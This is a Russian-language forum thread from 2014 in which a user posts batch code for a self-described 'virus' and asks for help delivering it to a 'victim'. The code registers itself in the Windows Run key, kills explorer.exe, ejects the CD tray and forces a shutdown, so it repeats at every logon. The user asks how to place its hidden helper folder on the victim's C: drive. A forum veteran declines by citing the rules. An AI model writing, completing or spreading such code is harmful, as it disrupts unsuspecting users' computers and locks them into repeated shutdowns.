Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Программирование, базы данных и автоматизация действий » Скриптовые языки администрирования Windows » CMD/BAT - Помогите с написанием bat-вируса

Закрытая тема
Настройки темы
CMD/BAT - Помогите с написанием bat-вируса

Новый участник

Благодарности: 0

Профиль | Отправить PM | Цитировать

Добрый вечер!
Прошу помочь мне с созданием вирусного батника.
Дело в том, что создавая этот батник я пользовался лишь кодами из интернета и нескончаемым количеством неудачных попыток, поэтому не удивлюсь если вы назовёте этот "вирус" глупым по написанию или вовсе по содержанию. Сама идея вируса состояла в том, чтобы жертва, загрузившая архив, в котором содержится : батвирус переконвертированный с помощью программы в *.exe и скрытая папка "BAT" (в которой находятся файлы CDRom.vbs (отвечает за открытие дисковода), timer.js (отвечает за задержу времени в 3 секунды) , картинка picture.jpg) , разархивировала этот архив и открыла *.exe файл :
Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MyBatch" /t REG_SZ /d "%~0" /f
taskkill /F /Im explorer.exe
C:\BAT\timer.js
start "" C:\BAT\picture.jpg
C:\BAT\CDRom.vbs
shutdown -s -t 10
Но после написания возникла проблема , каким образом папка "BAT" окажется у жертвы на диске C:\ ???
Ведь скачивается она в директорию указанную браузером! Поэтому Прошу Вас, помочь мне с тем , чтобы после отрытия вируса, cmd нашел мою скрытую папку BAT и переместил её в нужную директорию.
П.С. Также буду благодарен , если посоветуете литературу по програмированию windows посредством bat файлов, чтобы не приходилось залезать в интернет всякий раз, когда нужно выполнить то или иное действие!
Заранее благодарен!

Отправлено: 23:26, 05-03-2014

Ветеран

Благодарности: 8087

Профиль | Отправить PM | Цитировать

serewa007, внимательно прочтите Общие правила конференции OSZone.net, п.3.2.

Отправлено: 00:14, 06-03-2014 | #2

Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.

Компьютерный форум OSzone.net » Программирование, базы данных и автоматизация действий » Скриптовые языки администрирования Windows » CMD/BAT - Помогите с написанием bat-вируса

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено